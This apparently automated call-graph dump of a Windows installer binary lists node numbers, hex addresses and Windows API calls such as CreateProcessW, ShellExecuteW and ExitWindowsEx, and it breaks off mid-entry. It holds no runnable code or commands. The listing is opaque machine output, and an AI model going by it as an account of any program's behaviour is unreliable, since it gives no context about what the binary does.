3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3808 401a1f 3809 40145c 18 API calls 3808->3809 3810 401a26 3809->3810 3811 4062cf 11 API calls 3810->3811 3812 401a49 3811->3812 3813 401a64 3812->3813 3814 401a5c 3812->3814 3883 406035 lstrcpynW 3813->3883 3882 406035 lstrcpynW 3814->3882 3817 401a6f 3884 40674e lstrlenW CharPrevW 3817->3884 3818 401a62 3821 406064 5 API calls 3818->3821 3852 401a81 3821->3852 3822 406301 2 API calls 3822->3852 3825 401a98 CompareFileTime 3825->3852 3826 401ba9 3827 404f9e 25 API calls 3826->3827 3829 401bb3 3827->3829 3828 401b5d 3830 404f9e 25 API calls 3828->3830 3861 40337f 3829->3861 3832 401b70 3830->3832 3836 4062cf 11 API calls 3832->3836 3834 406035 lstrcpynW 3834->3852 3835 4062cf 11 API calls 3837 401bda 3835->3837 3841 401b8b 3836->3841 3838 401be9 SetFileTime 3837->3838 3839 401bf8 CloseHandle 3837->3839 3838->3839 3839->3841 3842 401c09 3839->3842 3840 406831 18 API calls 3840->3852 3843 401c21 3842->3843 3844 401c0e 3842->3844 3845 406831 18 API calls 3843->3845 3846 406831 18 API calls 3844->3846 3847 401c29 3845->3847 3849 401c16 lstrcatW 3846->3849 3850 4062cf 11 API calls 3847->3850 3849->3847 3853 401c34 3850->3853 3851 401b50 3855 401b93 3851->3855 3856 401b53 3851->3856 3852->3822 3852->3825 3852->3826 3852->3828 3852->3834 3852->3840 3852->3851 3854 4062cf 11 API calls 3852->3854 3860 405e7c GetFileAttributesW CreateFileW 3852->3860 3887 405e5c GetFileAttributesW 3852->3887 3890 405ccc 3852->3890 3857 405ccc MessageBoxIndirectW 3853->3857 3854->3852 3858 4062cf 11 API calls 3855->3858 3859 4062cf 11 API calls 3856->3859 3857->3841 3858->3841 3859->3828 3860->3852 3862 40339a 3861->3862 3863 4033c7 3862->3863 3896 403368 SetFilePointer 3862->3896 3894 403336 ReadFile 3863->3894 3867 401bc6 3867->3835 3868 403546 3870 40354a 3868->3870 3871 40356e 3868->3871 3869 4033eb GetTickCount 3869->3867 3874 403438 3869->3874 3872 403336 ReadFile 3870->3872 3871->3867 3875 403336 ReadFile 3871->3875 3876 40358d WriteFile 3871->3876 3872->3867 3873 403336 ReadFile 3873->3874 3874->3867 3874->3873 3878 40348a GetTickCount 3874->3878 3879 4034af MulDiv wsprintfW 3874->3879 3881 4034f3 WriteFile 3874->3881 3875->3871 3876->3867 3877 4035a1 3876->3877 3877->3867 3877->3871 3878->3874 3880 404f9e 25 API calls 3879->3880 3880->3874 3881->3867 3881->3874 3882->3818 3883->3817 3885 401a75 lstrcatW 3884->3885 3886 40676b lstrcatW 3884->3886 3885->3818 3886->3885 3888 405e79 3887->3888 3889 405e6b SetFileAttributesW 3887->3889 3888->3852 3889->3888 3891 405ce1 3890->3891 3892 405d2f 3891->3892 3893 405cf7 MessageBoxIndirectW 3891->3893 3892->3852 3893->3892 3895 403357 3894->3895 3895->3867 3895->3868 3895->3869 3896->3863 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3897 4038af #17 SetErrorMode OleInitialize 3898 406328 3 API calls 3897->3898 3899 4038f2 SHGetFileInfoW 3898->3899 3971 406035 lstrcpynW 3899->3971 3901 40391d GetCommandLineW 3972 406035 lstrcpynW 3901->3972 3903 40392f GetModuleHandleW 3904 403947 3903->3904 3905 405d32 CharNextW 3904->3905 3906 403956 CharNextW 3905->3906 3917 403968 3906->3917 3907 403a02 3908 403a21 GetTempPathW 3907->3908 3973 4037f8 3908->3973 3910 403a37 3912 403a3b GetWindowsDirectoryW lstrcatW 3910->3912 3913 403a5f DeleteFileW 3910->3913 3911 405d32 CharNextW 3911->3917 3915 4037f8 11 API calls 3912->3915 3981 4035b3 GetTickCount GetModuleFileNameW 3913->3981 3918 403a57 3915->3918 3916 403a73 3919 403af8 3916->3919 3921 405d32 CharNextW 3916->3921 3957 403add 3916->3957 3917->3907 3917->3911 3924 403a04 3917->3924 3918->3913 3918->3919 4066 403885 3919->4066 3925 403a8a 3921->3925 4073 406035 lstrcpynW 3924->4073 3936 403b23 lstrcatW lstrcmpiW 3925->3936 3937 403ab5 3925->3937 3926 403aed 3929 406113 9 API calls 3926->3929 3927 403bfa 3930 403c7d 3927->3930 3932 406328 3 API calls 3927->3932 3928 403b0d 3931 405ccc MessageBoxIndirectW 3928->3931 3929->3919 3933 403b1b ExitProcess 3931->3933 3935 403c09 3932->3935 3939 406328 3 API calls 3935->3939 3936->3919 3938 403b3f CreateDirectoryW SetCurrentDirectoryW 3936->3938 4074 4067aa 3937->4074 3941 403b62 3938->3941 3942 403b57 3938->3942 3943 403c12 3939->3943 4091 406035 lstrcpynW 3941->4091 4090 406035 lstrcpynW 3942->4090 3947 406328 3 API calls 3943->3947 3950 403c1b 3947->3950 3949 403b70 4092 406035 lstrcpynW 3949->4092 3951 403c69 ExitWindowsEx 3950->3951 3956 403c29 GetCurrentProcess 3950->3956 3951->3930 3955 403c76 3951->3955 3952 403ad2 4089 406035 lstrcpynW 3952->4089 3958 40141d 80 API calls 3955->3958 3960 403c39 3956->3960 4009 405958 3957->4009 3958->3930 3959 406831 18 API calls 3961 403b98 DeleteFileW 3959->3961 3960->3951 3962 403ba5 CopyFileW 3961->3962 3968 403b7f 3961->3968 3962->3968 3963 403bee 3964 406c94 42 API calls 3963->3964 3966 403bf5 3964->3966 3965 406c94 42 API calls 3965->3968 3966->3919 3967 406831 18 API calls 3967->3968 3968->3959 3968->3963 3968->3965 3968->3967 3970 403bd9 CloseHandle 3968->3970 4093 405c6b CreateProcessW 3968->4093 3970->3968 3971->3901 3972->3903 3974 406064 5 API calls 3973->3974 3975 403804 3974->3975 3976 40380e 3975->3976 3977 40674e 3 API calls 3975->3977 3976->3910 3978 403816 CreateDirectoryW 3977->3978 4096 405eab 3978->4096 4100 405e7c GetFileAttributesW CreateFileW 3981->4100 3983 4035f3 4003 403603 3983->4003 4101 406035 lstrcpynW 3983->4101 3985 403619 4102 40677d lstrlenW 3985->4102 3989 40362a GetFileSize 3990 403726 3989->3990 4004 403641 3989->4004 4107 4032d2 3990->4107 3992 40372f 3994 40376b GlobalAlloc 3992->3994 3992->4003 4119 403368 SetFilePointer 3992->4119 3993 403336 ReadFile 3993->4004 4118 403368 SetFilePointer 3994->4118 3997 4037e9 4000 4032d2 6 API calls 3997->4000 3998 403786 4001 40337f 33 API calls 3998->4001 3999 40374c 4002 403336 ReadFile 3999->4002 4000->4003 4007 403792 4001->4007 4006 403757 4002->4006 4003->3916 4004->3990 4004->3993 4004->3997 4004->4003 4005 4032d2 6 API calls 4004->4005 4005->4004 4006->3994 4006->4003 4007->4003 4007->4007 4008 4037c0 SetFilePointer 4007->4008 4008->4003 4010 406328 3 API calls 4009->4010 4011 40596c 4010->4011 4012 405972 4011->4012 4013 405984 4011->4013 4133 405f7d wsprintfW 4012->4133 4014 405eff 3 API calls 4013->4014 4015 4059b5 4014->4015 4017 4059d4 lstrcatW 4015->4017 4019 405eff 3 API calls 4015->4019 4018 405982 4017->4018 4124 403ec1 4018->4124 4019->4017 4022 4067aa 18 API calls 4023 405a06 4022->4023 4024 405a9c 4023->4024 4026 405eff 3 API calls 4023->4026 4025 4067aa 18 API calls 4024->4025 4027 405aa2 4025->4027 4028 405a38 4026->4028 4029 405ab2 4027->4029 4030 406831 18 API calls 4027->4030 4028->4024 4032 405a5b lstrlenW 4028->4032 4035 405d32 CharNextW 4028->4035 4031 405ad2 LoadImageW 4029->4031 4135 403ea0 4029->4135 4030->4029 4033 405b92 4031->4033 4034 405afd RegisterClassW 4031->4034 4036 405a69 lstrcmpiW 4032->4036 4037 405a8f 4032->4037 4041 40141d 80 API calls 4033->4041 4039 405b9c 4034->4039 4040 405b45 SystemParametersInfoW CreateWindowExW 4034->4040 4042 405a56 4035->4042 4036->4037 4043 405a79 GetFileAttributesW 4036->4043 4045 40674e 3 API calls 4037->4045 4039->3926 4040->4033 4046 405b98 4041->4046 4042->4032 4047 405a85 4043->4047 4044 405ac8 4044->4031 4048 405a95 4045->4048 4046->4039 4049 403ec1 19 API calls 4046->4049 4047->4037 4050 40677d 2 API calls 4047->4050 4134 406035 lstrcpynW 4048->4134 4052 405ba9 4049->4052 4050->4037 4053 405bb5 ShowWindow LoadLibraryW 4052->4053 4054 405c38 4052->4054 4055 405bd4 LoadLibraryW 4053->4055 4056 405bdb GetClassInfoW 4053->4056 4057 405073 83 API calls 4054->4057 4055->4056 4058 405c05 DialogBoxParamW 4056->4058 4059 405bef GetClassInfoW RegisterClassW 4056->4059 4060 405c3e 4057->4060 4063 40141d 80 API calls 4058->4063 4059->4058 4061 405c42 4060->4061 4062 405c5a 4060->4062 4061->4039 4065 40141d 80 API calls 4061->4065 4064 40141d 80 API calls 4062->4064 4063->4039 4064->4039 4065->4039 4067 40389d 4066->4067 4068 40388f CloseHandle 4066->4068 4142 403caf 4067->4142 4068->4067 4073->3908 4195 406035 lstrcpynW 4074->4195 4076 4067bb 4077 405d85 4 API calls 4076->4077 4078 4067c1 4077->4078 4079 406064 5 API calls 4078->4079 4086 403ac3 4078->4086 4082 4067d1 4079->4082 4080 406809 lstrlenW 4081 406810 4080->4081 4080->4082 4084 40674e 3 API calls 4081->4084 4082->4080 4083 406301 2 API calls 4082->4083 4082->4086 4087 40677d 2 API calls 4082->4087 4083->4082 4085 406816 GetFileAttributesW 4084->4085 4085->4086 4086->3919 4088 406035 lstrcpynW 4086->4088 4087->4080 4088->3952 4089->3957 4090->3941 4091->3949 4092->3968 4094 405ca6 4093->4094 4095 405c9a CloseHandle 4093->4095 4094->3968 4095->4094 4097 405eb8 GetTickCount GetTempFileNameW 4096->4097 4098 40382a 4097->4098 4099 405eee 4097->4099 4098->3910 4099->4097 4099->4098 4100->3983 4101->3985 4103 40678c 4102->4103 4104 406792 CharPrevW 4103->4104 4105 40361f 4103->4105 4104->4103 4104->4105 4106 406035 lstrcpynW 4105->4106 4106->3989 4108 4032f3 4107->4108 4109 4032db 4107->4109 4112 403303 GetTickCount 4108->4112 4113 4032fb 4108->4113 4110 4032e4 DestroyWindow 4109->4110 4111 4032eb 4109->4111 4110->4111 4111->3992 4115 403311 CreateDialogParamW ShowWindow 4112->4115 4116 403334 4112->4116 4120 40635e 4113->4120 4115->4116 4116->3992 4118->3998 4119->3999 4121 40637b PeekMessageW 4120->4121 4122 406371 DispatchMessageW 4121->4122 4123 403301 4121->4123 4122->4121 4123->3992 4125 403ed5 4124->4125 4140 405f7d wsprintfW 4125->4140 4127 403f49 4128 406831 18 API calls 4127->4128 4129 403f55 SetWindowTextW 4128->4129 4130 403f70 4129->4130 4131 403f8b 4130->4131 4132 406831 18 API calls 4130->4132 4131->4022 4132->4130 4133->4018 4134->4024 4141 406035 lstrcpynW 4135->4141 4137 403eb4 4138 40674e 3 API calls 4137->4138 4139 403eba lstrcatW 4138->4139 4139->4044 4140->4127 4141->4137 4143 403cbd 4142->4143 4144 4038a2 4143->4144 4145 403cc2 FreeLibrary GlobalFree 4143->4145 4146 406cc7 4144->4146 4145->4144 4145->4145 4147 4067aa 18 API calls 4146->4147 4148 406cda 4147->4148 4149 406ce3 DeleteFileW 4148->4149 4150 406cfa 4148->4150 4189 4038ae CoUninitialize 4149->4189 4151 406e77 4150->4151 4193 406035 lstrcpynW 4150->4193 4157 406301 2 API calls 4151->4157 4177 406e84 4151->4177 4151->4189 4153 406d25 4154 406d39 4153->4154 4155 406d2f lstrcatW 4153->4155 4158 40677d 2 API calls 4154->4158 4156 406d3f 4155->4156 4160 406d4f lstrcatW 4156->4160 4162 406d57 lstrlenW FindFirstFileW 4156->4162 4159 406e90 4157->4159 4158->4156 4163 40674e 3 API calls 4159->4163 4159->4189 4160->4162 4161 4062cf 11 API calls 4161->4189 4166 406e67 4162->4166 4190 406d7e 4162->4190 4164 406e9a 4163->4164 4167 4062cf 11 API calls 4164->4167 4165 405d32 CharNextW 4165->4190 4166->4151 4168 406ea5 4167->4168 4169 405e5c 2 API calls 4168->4169 4170 406ead RemoveDirectoryW 4169->4170 4174 406ef0 4170->4174 4175 406eb9 4170->4175 4171 406e44 FindNextFileW 4173 406e5c FindClose 4171->4173 4171->4190 4173->4166 4176 404f9e 25 API calls 4174->4176 4175->4177 4178 406ebf 4175->4178 4176->4189 4177->4161 4180 4062cf 11 API calls 4178->4180 4179 4062cf 11 API calls 4179->4190 4181 406ec9 4180->4181 4184 404f9e 25 API calls 4181->4184 4182 406cc7 72 API calls 4182->4190 4183 405e5c 2 API calls 4185 406dfa DeleteFileW 4183->4185 4186 406ed3 4184->4186 4185->4190 4187 406c94 42 API calls 4186->4187 4187->4189 4188 404f9e 25 API calls 4188->4171 4189->3927 4189->3928 4190->4165 4190->4171 4190->4179 4190->4182 4190->4183 4190->4188 4191 404f9e 25 API calls 4190->4191 4192 406c94 42 API calls 4190->4192 4194 406035 lstrcpynW 4190->4194 4191->4190 4192->4190 4193->4153 4194->4190 4195->4076 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 